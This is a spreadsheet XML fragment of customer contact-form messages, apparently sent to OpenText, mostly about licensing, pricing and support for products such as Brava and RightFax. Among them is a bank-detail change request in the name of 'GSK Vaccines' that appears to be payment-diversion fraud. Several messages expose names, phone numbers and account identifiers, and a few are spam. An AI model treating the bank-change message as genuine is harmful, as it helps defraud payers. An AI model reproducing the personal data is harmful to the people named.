    <t>i have used free dwg viewer for many years,but recently i noticed the note that Brava! DWG Viewer 16.2 will be the last release of Brava! DWG Viewer. It will expire on February 28, 2018. Users can upgrade to Brava! Desktop DXP and keep all the same functionality with no expiration date.i want to know how to get  Brava! Desktop DXP ,and how to use it,and will it be free for using? i usually use free dwg viewer by the Activex component on the website.Does the Brava! Desktop DXP support the way of  Activex component.</t>
  </si>
  <si>
    <t>Looking for alternative Archival solution</t>
  </si>
  <si>
    <t>Further information relevant to our Customer Communication Management initiative.</t>
  </si>
  <si>
    <t>Market assessment (licensing and indicative pricing) on behalf of a client</t>
  </si>
  <si>
    <t>Interest in documentum in the cloud</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in information on the CMIS adapter for OpenText. I would like information on OpenText version support, pricing, architecture, performance, etc. </t>
  </si>
  <si>
    <t>Document viewer issues in IDM viewer.. Its Urgent</t>
  </si>
  <si>
    <t>I am independent security researcher. There are security issues in your website and products. I want to help. Contact me back if possible._x000D_
Thanks</t>
  </si>
  <si>
    <t>I  need below product codes pushed through to Sears IMA _x000D_
20453_x000D_
20454_x000D_
20455_x000D_
20456</t>
  </si>
  <si>
    <t>Hello, is there a way to upload multiple GTINS/styles at a time to the GXS cataloge?</t>
  </si>
  <si>
    <t>Hello, I'm going to issue an RFP for a document management solution on behalf of my client, Jhpiego, and I was looking for a point of contact that I can send our requirements to. Please provide the name, email, and phone for the correct individual(s). Thank you in advance!</t>
  </si>
  <si>
    <t>Information regarding pricing specifics</t>
  </si>
  <si>
    <t>An extra maintenance copy was ordered by mistake. We would like to have this taken off of our purchase. As we only want 1 Redact-It single seat OCR and 1 maintenance package.</t>
  </si>
  <si>
    <t>Can you provide me a quote for 24x7 7 days a week RightFax support for an on premise customer?</t>
  </si>
  <si>
    <t>Please cancel our fax accounts.  I deleted all of the numbers as we no longer have a need for the service.  The account was brought over from easylink.  Please let me know the status.</t>
  </si>
  <si>
    <t>Initial contact to get base pricing for 85 users.</t>
  </si>
  <si>
    <t xml:space="preserve">When Purchasing the CXL version is the program good for as long as you want it? More than a year. Or must you purchase the maintenance each year otherwise it will expire similar to the free trail ? </t>
  </si>
  <si>
    <t>PLEASE SEND ME AN INVITATION CODE TO SIGN UP , AS WE HANDLE BUISINESS WITH COMCAST AND NEED TO ACCESS IN ORDER TO SEE INVOICES</t>
  </si>
  <si>
    <t>My Support access to download ExStream software</t>
  </si>
  <si>
    <t xml:space="preserve">I am having an issue logging in to my company's public catalogue. I was prompted to reset the password and changed it yesterday but cannot log on w/the new password. I have tried to reset the password twice but I am not getting an e-mail to do so. Can someone please help me and see the info below? I am in the Massachusetts office.  I really need to take care of the catalog errors for my company asap. _x000D_
_x000D_
Thank you for all your help!_x000D_
_x000D_
Regards, Lou_x000D_
_x000D_
Network ID:  R965_x000D_
User ID:  R965A_x000D_
Account Number: 010155192172_x000D_
</t>
  </si>
  <si>
    <t>Can I please obtain the Documentum 7.2 Developer Edition? I tried the link in this post https://community.emc.com/community/edn/documentum/blog/2015/11/21/documentum-72-developer-edition, but on the download page it displays "This file is not currently available for download".</t>
  </si>
  <si>
    <t xml:space="preserve">Per this link, sql server 2016 is supported by open text, but we will need you to confirm this _x000D_
http://www.opentext.com/what-we-do/partners-and-alliances/strategic-partners/microsoft-and-opentext_x000D_
_x000D_
Thank you_x000D_
Nava_x000D_
</t>
  </si>
  <si>
    <t>Trying to connect with your VP Federal regarding partnering on FedRAMP</t>
  </si>
  <si>
    <t>Request for a demo of creative review_x000D_
At L'Oreal USA, we are using OTMM 10.5 for our digital asset management._x000D_
To extend our offer to our internal customer, we are evaluating a solution for our creative team with more advance functionality._x000D_
As part of the solutions that we are evaluating, the addition of Creative Review is one option. Could we organize a demo with a Q&amp;A session in the coming 2 weeks?</t>
  </si>
  <si>
    <t xml:space="preserve">Need your queries for use in gathering metadata from your product call OpenText Integration Center (formerly Genio). These would be the same queries as used by your development staff when they are validating tests or want to check metadata. An example would be http://ds.datasourceconsulting.com/blog/querying-informatica-powercenter-repository/ for informatica._x000D_
_x000D_
This would be of importance and also help all your clients. _x000D_
You can respond to my email address since sometimes am away from my phone._x000D_
Have a great day!_x000D_
Kevin W. Dunn </t>
  </si>
  <si>
    <t>I need pricing information today on fax2mail services; set up; monthly charges; per page charges, etc.</t>
  </si>
  <si>
    <t>I would like to get a quote on adding 3 more Index Station Licenses.</t>
  </si>
  <si>
    <t>Just wanted to let you know that Getnet Bahlbi with your Opentext Support Team is my favorite.  Getnet goes above and beyond when addressing any questions I have.  Not only does Getnet respond to my issue, but also directs me to the proper place to either not have to submit a ticket in the future by setting up email preferences or by providing additional information on the issue.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am interviewing for a consulting position that will use OpenText. Can you recommend a general overview for someone (me) who will have to create a document control system. I have used CPDM and ComplianceWire at J&amp;J. The other question I have is, since I am an Oracle OBIEE expert, used Siebel Answers, for 12 years, I am guessing that OpenText will allow me to search the documents using some proprietary software. I did all of the severity-based trending at Cordis and that is what I actually enjoy the most. I have worked in quality control for Johnson &amp; Johnson for many years, then Cardinal Health. </t>
  </si>
  <si>
    <t>I have been calling your offices in South Africa for inquiry without luck.  no one is picking up and i would like to inquire about your upcoming conference that we would like to attend.  I need someone to urgently call me back.  alternatively you can find me on my mobile which is 27 82 892 2248</t>
  </si>
  <si>
    <t>Hi, Would you interested in Siemens PLM Technology Customers from USA.?_x000D_
_x000D_
We have 9,033 Tele verified database  of   Siemens PLM Technology  Customers from USA .(New  2017)._x000D_
_x000D_
Kindly revert with your requirement for a test file._x000D_
_x000D_
All Premium Quality Database.(New 2017)._x000D_
_x000D_
Regards,_x000D_
_x000D_
Cheri Hubbard_x000D_
CMO_x000D_
lead-pool_x000D_
Email: cheri.hubbard@lead-pool.com</t>
  </si>
  <si>
    <t>Hello There,_x000D_
My company, data-planet.co.uk is a startup in Business Analytics for Passenger Transport, So I'm looking forward for some business collaboration. Appreciate hearing back from you._x000D_
Regards, Is</t>
  </si>
  <si>
    <t>ENABLE THE BRAVA READER "FREE" FOR WINDOWS SEVEN ULTIMATE</t>
  </si>
  <si>
    <t>Prezados,_x000D_
_x000D_
Internalizamos demanda para aquisição de Ferramenta de Workflow com Recursos de Captura de Imagens/Documentos e GED que tem como característica instituir um projeto corporativo para implantação de Gerenciamento Eletrônico de Documentos – GED, possibilitando a implantação de um sistema de melhoria no controle de gestão documental, através da implementação de suporte tecnológico que possibilite uma maior governança do Banco, e ao mesmo tempo agilize os processos de negócio, diminuição de custos e consequente diminuição na burocratização dos mesmos, assim como mitigação de risco operacional, dentre outros. Em consulta ao Quadrante Mágico da Gartner referente a soluções de ECM, verificamos que a Opentext que adquiriu a ferramenta Documentum que era da Dell-EMC se posiciona como uma da 4 empresas líderes de solução, por causa disso formalizamos este e-mail afim de conhecer e principalmente formatar uma proposta comercial para levantar os custos necessários para implantarmos a solução que atenda a instituição._x000D_
_x000D_
A ferramenta deverá ser Workflow, a qual deverá suportar os fluxos de processos de negócio da Instituição a serem modelados em BPM, tendo como premissa a execução e gestão dos fluxos, de forma a automatizar processos de negócio, nos quais os documentos, informações e tarefas deverão passar de empregado para empregado, seguindo hierarquia estabelecida e de acordo com o conjunto pré-estabelecido de regras._x000D_
Conforme estabelecido pela governança do projeto GED os primeiros processos de negócio a serem abrigados pela ferramenta de Workflow são: Cadastro de Clientes, Abertura de Contas e Crédito. Tal ferramenta deverá abrigar também outros processos de negócio a serem definidos pela governança do projeto GED a partir da conclusão de implantação dos primeiros processos._x000D_
_x000D_
Além da tramitação automatizada, a ferramenta de Workflow deverá estar integrada a um software de captura de imagens, GED e Repositório Eletrônico de Documentos, proporcionando maior ges</t>
  </si>
  <si>
    <t>We would like to below information for a private cloud setup of Team site for standard number of users in a large organisation._x000D_
1) Type of Database_x000D_
2)  CPU_x000D_
3) Memory _x000D_
4) OS_x000D_
5) Number of Servers</t>
  </si>
  <si>
    <t>I have requested a link for the free Brava reader download and have not received an email within a week._x000D_
I find the application highly useful to scale pdfs and would like to continue using Brava Reader for these purposes.</t>
  </si>
  <si>
    <t>hi,_x000D_
i am looking for a module that can read QRP files and save them in csv format (unicode).</t>
  </si>
  <si>
    <t>Showcase your Tech Startup, IT / Mobile Applications or IT Solutions Company as one of the Best Companies in South Africa! CIOs want to see your Implemented solutions!_x000D_
_x000D_
Hi,_x000D_
_x000D_
We are proud to announce the launch of our brand new, completely unique ICT Solutions Directory &amp; Special Package deal which will get you enhanced, long term exposure to over 5 000 Heads of IT, CIO’s and ICT Decision Makers throughout SA. _x000D_
_x000D_
Please contact me or send me an email requesting our info pack to secure a prime slot to showcase one of your latest implemented solutions case studies or a company profile with key solutions you are promoting this year or a generic advert marketing your company._x000D_
_x000D_
We will be releasing the publication in September. If you are presenting a case study implementation we would require any implemented case study between June 2016- June 2017._x000D_
_x000D_
Clients already on board include SAP, Citrix, Mimecast, Checkpoint Security, Red Edge Solutions, HP Enterprise etc….._x000D_
_x000D_
Please find generic information attached – for an overview ~_x000D_
_x000D_
We are offering a 4 page advert special at R49 500 (ZAR) for Corporates valid till 15 April 2017._x000D_
_x000D_
SME Solution Providers R37 500 (ZAR) for a 4 Page Advert._x000D_
_x000D_
Besides your advert in the publication we will include the following:_x000D_
_x000D_
An announcement to over 30 ICT groups on LinkedIn, an announcement on Twitter and your company logo and / or banner ad in our direct mailer to over 3000 Heads of IT._x000D_
_x000D_
The publication is a final overview of your key solution offering for the year!_x000D_
_x000D_
We look forward to your company joining SAP, Mimecast, HP Enterprises, Red Edge Solutions, Citrix etc…._x000D_
_x000D_
_x000D_
The general package includes:_x000D_
_x000D_
·         Inclusion in the Guide of Practical Case Studies, useful Data Sheets &amp; General Branding of your Company _x000D_
·         Plus several Digital Marketing add-ons to assist you in placing Your Company directly in front of your Target Audience _x000D_
_x000D_
The question is WHY?  Why do solution providers need more coverage?  Do</t>
  </si>
  <si>
    <t>Hi My Name is Agni, i am the Head of Marketing Technology for Mirum Jakarta, we are a Digital Marketing Agency that focus on Implementing marketing technology solution, one of them is CMS technology, there fore i would like to know your CMS technology, what set you apart from the competition and the pricing structure you have._x000D_
_x000D_
looking forward to hearing from you</t>
  </si>
  <si>
    <t>I filled out the Free DWG viewer form three times. Still have not gotten the download link. Please help.</t>
  </si>
  <si>
    <t>We have recently been granted Silver services partner and I am trying to set up Support access, I have clicked on the verification email, but still do not have access to support - please can you assist</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
da Thomas Berger die Firma inzwischen verlassen hat, melde ich mich mit seinem Account an. Gestern hatte ich Sie schon per Mail kontaktiert. Herr David Lindner-Akdeniz hat mir daraufhin mitgeteilt, dass ich eine Admin Rolle benötige, um ein Ticket zu öffnen. Mein Kollege Felix Könnicke, der eine Admin Rolle besitzt, ist leider krank, so dass er mir die Admin Rolle nicht zuweisen kann. Können Sie mir bitte trotzdem weiterhelfen?_x000D_
Mein Anliegen ist folgendes:_x000D_
Nach einem Java Update von Version 8.121 auf 8.131 lassen sich in Livelink keine Bilder mehr ersetzen._x000D_
Ist Ihnen das Problem bereits bekannt?_x000D_
Haben Sie dafür eine Lösung?_x000D_
Vielen Dank im Voraus!_x000D_
Mit freundlichen Grüßen,_x000D_
Clemens Gehrig</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
Kathy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need Brava DWG Viewer. Free version does not work with Win7, requires Win10. Let me know if its possible to get Win7 version. In case I´ll purchase full version, need the same - Win7 version. In case of later upgrade to Win 10, will I get upgrade?_x000D_
thanks_x000D_
Regards,_x000D_
e.Martinek  </t>
  </si>
  <si>
    <t>Hello._x000D_
Is Brava supported on SharePoint 2016?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are in Garments sector and interested to do marketing for  your system with our Garments Manufacturer.  </t>
  </si>
  <si>
    <t xml:space="preserve">Pricing for Opentext Content Suite platform </t>
  </si>
  <si>
    <t>I'm not more able to contact our regional (Italy) distributor. 4 month ago we had contact with NEOL. They changed company into Didacloud srl. They don't respond to mail or direct call. Are they still alive?</t>
  </si>
  <si>
    <t>For the Third time I've been having problems logging in to the Knowledge center..</t>
  </si>
  <si>
    <t>Not able to access OpenText knowledge center</t>
  </si>
  <si>
    <t xml:space="preserve">We @ V2Solutions planning to set up competency around Dell EMC – InfoArchive platform. _x000D_
_x000D_
We open to partner with OpenText on this._x000D_
_x000D_
We need :_x000D_
_x000D_
1.	Copy of Product (trial to start with &amp; we open to purchase later)_x000D_
2.	learning i.e. Installation, Configuration full Operations of Solution for V2 team (Classroom or Online)_x000D_
_x000D_
Can you help in getting this proposal for me?_x000D_
</t>
  </si>
  <si>
    <t>Interested in your Invoice Capture Centre Software</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am looking at running a community library in my town and looking for a good library management suite which will help me in running the library operations. _x000D_
Kindly let me know the license price and the terms and conditions for the same._x000D_
Aslo, will I be getting any hands on help in setting up the system at the library._x000D_
_x000D_
Thanks In Advance_x000D_
Shilpa Ashwin_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Have been trying to get the download for MBPM 7.6.4 we are currently on  7.6.3 - have not heard back from anyone - This has now become urgent  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to learn more about Brava! license.    Interested in purchasing but need cost information and the detail of the cost.  Is this one time fee or annual licensing fee?   Please advise.  Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">What type of support does our contract allow?  I would like to resolve an issue with DM 10 and need to create a service ticket.  Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Interested to view a demonstration of your product.</t>
  </si>
  <si>
    <t>license and support</t>
  </si>
  <si>
    <t>Does Brava! Desktop TX run with Windows 7?</t>
  </si>
  <si>
    <t>Unable to verify Billing.</t>
  </si>
  <si>
    <t>Licensing and support for EMC Documentum products</t>
  </si>
  <si>
    <t>What is the price quote of upgrading eDOCS DM from version 5.3 to 16.1</t>
  </si>
  <si>
    <t>we need to make a switch on our interface and I need assistance. we are changing the SAP server</t>
  </si>
  <si>
    <t>Estamos licitando uma appliance para realizar indexação de diversas bases contendo (html, pdf e Doc), contendo inclusive documentos digitalizados sem OCR, para buscas segmentadas permitindo recursos para refinamento de consultas._x000D_
o software documentum foi citado durante a pesquisa de mercado e gostaríamos de encaminhar para você o Termo de referencia para levantamento de custo para possível participação no edital de contratação.</t>
  </si>
  <si>
    <t xml:space="preserve">Beaumont Health is in the RFI process for archival solutions and services.  We would like to include your organization in the preliminary selection process.  Please send a contact name, email and phone number to Cynthia.Mitas@beaumont.org to receive the RFI questionnaire._x000D_
_x000D_
Thanks, Cyndi_x000D_
</t>
  </si>
  <si>
    <t>Overview of Open Text Solutions on SAP S4/HANA</t>
  </si>
  <si>
    <t xml:space="preserve">We are a book printing and publishing company looking for a DAM solution to help manage our archive and production projects. </t>
  </si>
  <si>
    <t>Getting message that I am not a registered user for online support.</t>
  </si>
  <si>
    <t>We have a customer that is planning on migrating some of their Notes applications to .NET. Is the OpenText Composer Notes product available for purchase so that my company can perform the migration or would we need to hire your company to perform the actual migration? If available for purchase, can I receive pricing info? Thanks.</t>
  </si>
  <si>
    <t>We would like to open a presales case for one of our European financial customers. Due to NDA requirements, we cannot disclose their identity at this stage._x000D_
_x000D_
We are currently analyzing and envisioning a pricing simulation solution that allows them to enrich large volumes of data, transform them through basic but user friendly modifiable matrices (costs per transaction and many others) to finally pivot on the results (e.g. with export to Excel). But most of all, it needs to be one unified user interface that is very easy to use and intuitive and needs to lightning fast. This cannot be a cloud solution.</t>
  </si>
  <si>
    <t>Pricing on OpenText Exceed on Demand for 10 seats (client, with 2-3 shared X windows desktops)</t>
  </si>
  <si>
    <t>Government Client looking for pricing.  I have government client looking for pricing on Opentext Brava iXL , could I get reseller pricing for the product 5 licenses with maintenance</t>
  </si>
  <si>
    <t>Looking for more information about Documentum specifically with integration with ESRI desktop or web applications. Or information on developing general web/client applications integrating Documentum for back end storage. _x000D_
_x000D_
I found an EMC paper that mentioned ESRI so I was wondering if there was a Demo or add-in for ESRI.</t>
  </si>
  <si>
    <t>Error during install im running windows 7 but its giving me the following error " WIndows versions prior to Windows 10 require Windows Update KB2999226 for Universal CRT before using this product. Setup will abort." I had brava reader before. I was forced to update and now it wont install. I went to install the KB2999226  and it says its not applicable to my computer. can you assist me with getting the program installed. I did not have problems before being forced to update.</t>
  </si>
  <si>
    <t>Hello, _x000D_
We recently became aware that an automatic upload had been transmitting to a vendor partner we have not been in business with for quite some time (Macy's). We have updated this vendor access to "restricted" but are wondering if there are any additional steps we need to take to cancel this automatic transmission. _x000D_
If you could please respond to the email provided above or give me a call I would greatly appreciate it. _x000D_
Account# 125627993311</t>
  </si>
  <si>
    <t>does Brava support BIM files ie IFC</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for the installation guide for RightFax 10.6.3.2109_x000D_
I am looking for the installation guide for RightFax 10.6.3.2109.  I am not sure if my company has an active support contract._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Japura road doraha </t>
  </si>
  <si>
    <t>Good morning, I am attempting to verify a previous employment for an applicant that worked at Daegis from 2011-2012. Would you have those employment records? If so, could you provide me with a direct contact - such as email or fax - for Human Resources or whomever has those records? Any information would be greatly appreciated. Thank you and have a wonderful day!</t>
  </si>
  <si>
    <t>Question Brava Reader, is the yearly maintenance payment required to keep the brava reader running? further more is the 145$ dollar price a one time thing?</t>
  </si>
  <si>
    <t>We need to upgrade the server right fax is installed on.  I would like some information on how to backup rightfax and move it to the new server.</t>
  </si>
  <si>
    <t>I have seen thru Facebook (and then when searching your site) reference to an upcoming Analytics Workshop in Arlington VA, on May 10. When I attempt to register for the workshop (filling in the fields above, by the way), it gives me an error saying that "Industry" is a required field. Can you please advise on how I might successfully register for the May 10 event? Thanks.</t>
  </si>
  <si>
    <t>documentation on metadata in Genio/Open Text</t>
  </si>
  <si>
    <t>Hi_x000D_
I am interested to know more about the following solutions http://www.opentext.com.au/file_source/OpenText/en_US/PDF/Whitepaper-ECM-for-Supplier-Contract-Management.pdf _x000D_
Regards,_x000D_
Adi</t>
  </si>
  <si>
    <t>Hi, one of our customers is using the free version of Brava! Desktop DXP Viewer in a Windows 2012 R2 RDS deployment. Which version is supported in this environment and how does the licensing work?_x000D_
_x000D_
Best regards, Joost</t>
  </si>
  <si>
    <t>Does your company have a TM1 type product?</t>
  </si>
  <si>
    <t>We us HP Exstream 8.6.106 Design Manager/Designer and database maintenance appears to be 'froze up' in our development database which has caused all our applications to be locked. What can we do to resolve this issue?</t>
  </si>
  <si>
    <t>User cannot login to ANX</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Supplier, we have recieved your letter regarding change of accounts. I just want to check if that is correct? Kind Regards </t>
  </si>
  <si>
    <t>I have no Access to the Support Portal. I Need to know who is mentioned in the Portal to ask for Support._x000D_
Please be so Kind as to Name each Person. In Addition please Point out how I get Access to our Support Portal._x000D_
Thanks for your Support!</t>
  </si>
  <si>
    <t>Dear Madam or Sir,_x000D_
_x000D_
I am currently doing the PhD in Computer Science at the University of Innsbruck (Austria). In this context, I am working on the topic of Enterprise Architecture Management._x000D_
My PhD thesis is about IT Enterprise Architecture Planning. Currently, I am trying to find out how IT-transformation projects are conducted in practice and how tools support them (especially considering the Industrial Internet of Things / Industry 4.0)._x000D_
Therefore, I would appreciate a live demo of your tool “ProVision” in the context of Enterprise Architecture Planning._x000D_
_x000D_
I hope that you will help me with my research. Certainly, I will share the results of my research with you._x000D_
_x000D_
_x000D_
Kind regards,_x000D_
Emmanuel Nowakowski</t>
  </si>
  <si>
    <t>Implemented Software (IXOS) does not have flag "UNICODE enabled"</t>
  </si>
  <si>
    <t>We are looking for Email filing software that can store emails of all our users at single location and those emails should be accessible by other users based on their permissions.</t>
  </si>
  <si>
    <t xml:space="preserve">license transfer/name change for client </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, Madam,_x000D_
_x000D_
Your company has been identified as a supplier at GSK Vaccines for which a change in the bank details has been requested._x000D_
_x000D_
To ensure payment on time, avoid any risk of fraud and accelerate the administrative processing of this request, please confirm your below bank details by responding to this email._x000D_
_x000D_
IBAN: GB88CITI18500817495781_x000D_
SWIFT: CITIGB2L_x000D_
_x000D_
Please be advised that without your confirmation, no payment can be performed._x000D_
_x000D_
Thank you for your cooperation._x000D_
_x000D_
Treasury_x000D_
GSK Vaccines_x000D_
</t>
  </si>
  <si>
    <t>Hi. Could you inform us the local vendor of captiva license in Indonesia for kodak scanner.</t>
  </si>
  <si>
    <t>Hello, could you send link to free-software for windows 7, please? Thank you in advance. Sebastian Szczepaniak</t>
  </si>
  <si>
    <t>I would like product information RightFAX to be able to sell it in Spain. Do you have a distributor in Spain with whom we can contact to get a list of prices and products associated with RightFAX?</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for some information about Brava! for D2. Hope Opentext can answer the following questions. Thank you_x000D_
_x000D_
1)Proposed Edition and Release No._x000D_
2)Date of the proposed Release._x000D_
3)Average Release Frequencies (Major):_x000D_
4)Average Release Frequencies (Minor):_x000D_
5)De-support Policy:_x000D_
6)Estimate number of years to de-support from Jun 2017._x000D_
</t>
  </si>
  <si>
    <t>We are interested in your mobile capture solution and would like to invite your solution specialist to present your solution to our IT architect._x000D_
We are looking for a solution to capture document with OCR, ICR, and OMR and upload to document management solution. _x000D_
_x000D_
Looking forward to hear from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to download my google play its stopped also need all my apps back and my at homepage </t>
  </si>
  <si>
    <t xml:space="preserve">DAM / hybris product demo and vendor  partnership </t>
  </si>
  <si>
    <t>We are working on a project which involves DAM. _x000D_
_x000D_
We have put together a major feature list (I need an email to attach the list). Please let me know which features can be done using your platform without any development and which features need development. _x000D_
_x000D_
Also we wanted to get a ballpark price for both hosted or non-hosted versions (If you have any)</t>
  </si>
  <si>
    <t xml:space="preserve">I need assistance with this client request.:  We use PixTool “EZ” and PixTools “IP” version 7.3 (it’s apparently .net 1.1) and we need to upgrade them both for this app so we can go to windows 10 with it. _x000D_
_x000D_
The demo software I downloaded doesn’t seem to have PixTools.EZ.ezImage user control for winforms that our app uses though… so I seem to be missing something._x000D_
_x000D_
So I also could really use the documentation for the latest version as well._x000D_
_x000D_
Thanks!_x000D_
_x000D_
James Peckham_x000D_
Application Development Manager_x000D_
Hooper Holmes Incorporated_x000D_
560 N Rogers Road_x000D_
Olathe, KS 66062_x000D_
_x000D_
913-219-1433_x000D_
_x000D_
I’ve got a new little issue though. We have this old app that is on windows xp and it uses a very old version of this product:_x000D_
_x000D_
_x000D_
_x000D_
PixTools for .NET Toolkit 8.6_x000D_
_x000D_
_x000D_
Do you license pixtools? It’s from EMC/OpenText/Dell_x000D_
_x000D_
If so, could you build a quote for us?_x000D_
_x000D_
I downloaded a trial and am seeing if I can get it to work to replace the old version we have, but I’ll need a license. 1 ‘developer’ license or 1 ‘machine’ license if it’s licensed by use._x000D_
_x000D_
Thank you!_x000D_
_x000D_
James Peckham_x000D_
Application Development Manager_x000D_
Hooper Holmes Incorporated_x000D_
560 N Rogers Road_x000D_
Olathe, KS 66062_x000D_
_x000D_
913-219-1433_x000D_
</t>
  </si>
  <si>
    <t>We have been EMC Captiva customer for more than 10 years.  I also have my support account there.   Please advise how my support account works here.  Was it transferred? what is the link?  what login, server, license ID I need to resume my access to Tech Support?   Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">In an effort to improve operations and reduce enterprise risk, ARAG Legal wishes to purchase and install a document management system. Your firm is invited to submit a response to our Request for Information (RFI). _x000D_
_x000D_
I need to submit and ask that your organization complete a Non-Disclosure Agreement. To participate, please indicate your desire to do so by email and submit the signed Non-Disclosure Agreement to the following contact person no later than May 10, 2017. _x000D_
</t>
  </si>
  <si>
    <t>We want to building a global communications platform. Would want to take a look at your offerings, and how we can work together.</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I've made a few attempts to contact you guys and I'm wondering if any of my submissions have made it through? Looking forward to hearing back._x000D_
_x000D_
Kind Regards,_x000D_
Peter Darmon</t>
  </si>
  <si>
    <t>My name is Kristine and I am assisting Alan and we need to add the SDF BBY account (846750017) to our already existing account (13171), please advise on what the steps are to add this.</t>
  </si>
  <si>
    <t>Interested in automating information consolidation and availability.</t>
  </si>
  <si>
    <t>We bought Teleform 10.8 in 2014 and need to download the software again. HP directed us to you.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
The Mayor and Council of Asbury Park is in the process of developing a workforce development strategy. As part of the planning process, Asbury Park is hosting input sessions with local business and industry leaders to understand local priorities and workforce-related needs.  Through the input sessions, we hope to engage with local representatives and gather feedback on priorities and the direction for the City’s workforce strategy.  During the input session, the topics covered will include the strengths of local workforce services, challenges or gaps in services that currently exist, and opportunities to better meet your needs. You have been identified as a key influencer on the city and region and we kindly request your participation and feedback at an upcoming input session. With your input the Council is committed to producing a plan that has actionable goals and improves outcomes for employers, workers, job seekers, and the local community._x000D_
_x000D_
Business &amp; Industry Input Session Details: _x000D_
Monday, May 15th_x000D_
1:00 p.m. - 2:30 p.m._x000D_
Business and Industry Focus Group_x000D_
Location: Senior Center_x000D_
              1201 Springwood Ave_x000D_
              Asbury Park, NJ 07712_x000D_
_x000D_
Please share this email with colleagues and others that would be interested in participating. Please RSVP to Brittany Dougherty (bdougherty@tpma-inc.com) by Tuesday, May 9th. Thank you in advance for your time and willingness to contribute to this strategic planning process.   _x000D_
_x000D_
Additionally, we will have public meetings to gather additional input. You are welcome to participate in the public meetings or share the information with others to encourage their attendance and participation._x000D_
_x000D_
Monday, May 15th_x000D_
6:30 p.m. – 8:00 p.m._x000D_
Public Meeting_x000D_
Location: Senior Center_x000D_
              1201 Springwood Ave_x000D_
              Asbury Park, NJ 07712_x000D_
_x000D_
Tuesday, May 16th_x000D_
9:00 a.m. – 10:30 a.m._x000D_
Public Meeting_x000D_
Location: City Council Chambers_x000D_
   One Municipal Plz_x000D_
   Asbury Park, NJ 07712_x000D_
_x000D_
Michael</t>
  </si>
  <si>
    <t>guest test post _x000D_
[url=http://googlee.te/]bbcode[/url] _x000D_
&lt;a href="http://googlee.te/"&gt;html&lt;/a&gt; _x000D_
http://googlee.te/ simple</t>
  </si>
  <si>
    <t>Find out if the Analytics Suite can help mine data from attributes in Content Server before booking travel to the Complimentary Analytics Workshop in Washington D.C.</t>
  </si>
  <si>
    <t>Shipping Schedule</t>
  </si>
  <si>
    <t>We are looking for a tool that can convert PDF files to TIFF.  Is this something that Brava Desktop is capable of doing?  Also, we are looking to see if it is possible to combine multiple TIFF files into one  TIFF file with multiple pages.</t>
  </si>
  <si>
    <t>Dear sir/madam, I was wondering if it is possible for me to send an open application to you? I found your company through a list of top employers in the Waterloo Guelph area. I have to do an internship that could offer the company something as wel. The problem is that this means I can't apply to the opportunities on your website. Is it possible for me to send an email with more information directly to someone? With kind regards, Jasper Kool</t>
  </si>
  <si>
    <t>We are looking for Contract Management and Vendor Invoice Payment Solution with SAP integration. Please let me know your India Partner contact details or please arrange for demo and solution details.</t>
  </si>
  <si>
    <t>I'm doing my thesis on BPMN, DMN and CMMN and I was wondering if your product, besides BPMN, also uses DMN for the rule engine and CMMN for case management? If so, is it possible to get a trial license to test the product untill August 2017?_x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>Document recognition / meta data capture</t>
  </si>
  <si>
    <t>Want to the URL for the documentation for the Integration Center Repository for Genio/Open Text. Want to know how to query the DB repository and also to be familiar with XML data grams. Essentially want to know how to run your reports on metadata from the Integration Center Repository.</t>
  </si>
  <si>
    <t xml:space="preserve">To get higher package </t>
  </si>
  <si>
    <t xml:space="preserve">i have a copy of Global 360 (File 360)  files, i have a copy 6.0.2, it contain some PDF guide files and i need to another files such as _x000D_
1-Installation and Configuration Guide_x000D_
2-External Folder Interface and Hybrid Database Update Guide_x000D_
3-Web Guide_x000D_
4-Application Program Interface Guide_x000D_
5-Logging and Tracking Guide_x000D_
but if you do not have these files, i want to tell me a way to run File360Client authentication, it give me a message (could not connect to net.tcp://127.0.0.1:8001/duplex)_x000D_
the connection attempt lasted for a time span of, TCP error code 10061: no connection could be made because the Target machine actively refused it 127.0.0.1.8001._x000D_
if you can help me send a message quickly to reply about this _x000D_
I am waiting your reply </t>
  </si>
  <si>
    <t>Hello, do you have version for Windows 7 available? I can not install your software on my machine.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
I downloaded your BRAVA FREE DWG VIEWER program, but I can not install it, my operating system is Windows 8.1, what can I do?_x000D_
Thank you for the reply_x000D_
_x000D_
Tiziano Bellani_x000D_
GRE-CER srl_x000D_
</t>
  </si>
  <si>
    <t>To Whom it May Concern:_x000D_
_x000D_
My name is Janelle Brice, CEO of Davis Wick Talent. I noticed that you will be attending the 2017 SAPPHIRE NOW CONFERENCE Orlando, FL. I represent talent from Brand Ambassadors, Promotional/Trade show Models, Presenters &amp; Hosts/Hostesses that can all make your event memorable and engaging. Trade Show talent is so important for helping exhibitors achieve their goals; not only do trade show talent knows how to interact with potential customers, but with minimal managing they can pre-qualify leads too!_x000D_
_x000D_
If you’re seeking a way to reach a larger audience and increase your trade show leads at your next promotional event or trade show, then hiring trade show talent is just what you need! From scanning badges, passing out flyers, and engaging in conversation with attendees; trade show talent will be a great addition to your booth. Trade show promotional talent have years of experience in the industry. They know what it takes to make a great first impression and build relationships with your most valued customers. If you’ve never hired trade show staff before, then you’re missing out on hundreds of potential leads, sales and establishing positive impressions for your brand. _x000D_
_x000D_
